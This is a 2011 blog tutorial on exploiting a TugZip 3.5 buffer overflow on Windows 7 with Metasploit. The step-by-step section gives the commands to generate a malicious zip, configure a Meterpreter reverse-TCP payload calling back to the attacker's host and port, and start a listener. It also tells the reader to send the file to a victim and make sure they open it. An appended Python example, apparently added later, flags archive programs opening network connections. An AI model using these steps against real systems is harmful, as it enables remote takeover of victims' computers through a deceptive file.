
Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability (Zeroday) (by heykhend)

Written by Nanda Journey on Sunday, 20 November 2011 | 15.09

 
Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows 7 SP1

Tested Vulnerable Application : TugZip 3.5

Exploit Credit : Stefan Marin, Lincoln, TecR0c, mr_me

I wrote this tutorial after browsing around Metasploit and finding this exploit :-) .
According to metasploit.com, about this exploit:
This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.
Let's try this in your personal lab, using a virtual machine.

Requirements :

1. TugZip 3.5
Download from Mediafire.com

2. TugZip Exploit
3. Metasploit Framework

Step By Step :

Attacker IP Address : 192.168.8.93

Victim IP Address : 192.168.8.91

1. Download TugZip from the Mediafire link above and install it on the victim computer (for testing purposes).
2. Open the Metasploit console by running the msfconsole command, then update it first using the msfupdate command to update the library. If you don't have an internet connection to update the library, you can download the exploit above and then put it in /pentest/exploits/framework/modules/exploit/windows/fileformat/
Use the exploit and then set up the payload (see picture below).
[Image: Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability (Zeroday)]
3. In the next step, configure the options this exploit needs to match your setup. To view all available options, run the show options command.
Info :

set filename h0T-clipS.zip --> set your desired filename for the malicious file

set lhost 192.168.8.93 --> set the local address the payload connects back to when the exploit is successfully triggered

set lport 443 --> our local port to receive the connection from the victim

exploit --> generate the malicious file with the payload

/root/.msf4/data/exploits/h0T-clipS.zip --> the malicious file is stored in this location
4. In the next step, we need to set up a listener to handle the reverse connection from our exploit (if it's successfully triggered).
Info :

use exploit/multi/handler --> set up a handler to handle the connection to our machine

set payload windows/meterpreter/reverse_tcp --> make this the same as the payload we already set up above

set lhost 192.168.8.93 --> make this the same as the IP we already set up above

set lport 443 --> make this the same as the local port we already set up above

exploit --> start listening for the incoming connection
5. After everything has been set up, we need to send the malicious file from step 3 to the victim and make sure the victim opens that file. After the victim opens our malicious file, our Metasploit console will have an active session on the victim system.
Pwn3D!!

Countermeasures :

1. As of the time I wrote this tutorial (2011-10-15), the status is still zero-day, a.k.a. no cure.
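
With no fix available, detection is what is left: the payload runs inside the exploited TugZip process, so the connection back to lhost:lport in step 5 is opened by an archive utility, which normally has no reason to open network connections. The example below is added here and is not part of the original tutorial; the log records are constructed (modelled on Sysmon Event ID 3 fields), and the image names and the function name are assumptions.

```python
import csv
import io
import ipaddress

# Constructed sample records (not real telemetry), modelled on Sysmon Event ID 3
# fields: time, Image, Initiated, DestinationIp, DestinationPort.
SAMPLE_LOG = r"""
2011-11-20 15:01:12,C:\Windows\System32\svchost.exe,true,192.168.8.1,53
2011-11-20 15:02:40,C:\Program Files\Internet Explorer\iexplore.exe,true,93.184.216.34,443
2011-11-20 15:03:05,C:\Program Files\TUGZip\TUGZip.exe,true,192.168.8.93,443
2011-11-20 15:03:09,C:\Windows\System32\svchost.exe,false,192.168.8.91,49211
2011-11-20 15:03:30,C:\Program Files\TUGZip\TUGZip.exe,true,not-an-ip,443
"""

# Assumed image names of archive utilities; adjust to the software inventory.
ARCHIVERS = {"tugzip.exe", "7zfm.exe", "winrar.exe"}
FIELDS = ["time", "image", "initiated", "dst_ip", "dst_port"]


def archiver_connections(log_text, watched=ARCHIVERS):
    """Return (hits, malformed): outbound connections opened by a watched
    archive utility, and the rows that could not be parsed."""
    hits, malformed = [], []
    for row in csv.DictReader(io.StringIO(log_text.strip()), fieldnames=FIELDS):
        try:
            ip = ipaddress.ip_address(row["dst_ip"])
            port = int(row["dst_port"])
        except (ValueError, TypeError):
            malformed.append(row)  # keep for review instead of dropping silently
            continue
        exe = row["image"].rsplit("\\", 1)[-1].lower()
        if exe in watched and row["initiated"].lower() == "true":
            hits.append({"time": row["time"], "image": row["image"],
                         "dst": f"{ip}:{port}",
                         "scope": "internal" if ip.is_private else "external"})
    return hits, malformed


if __name__ == "__main__":
    hits, malformed = archiver_connections(SAMPLE_LOG)
    for h in hits:
        print(f"ALERT {h['time']} {h['image']} -> {h['dst']} ({h['scope']})")
    print(f"{len(malformed)} malformed row(s) kept for review")
```
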
Hope it's useful :-)
by admin : heykhend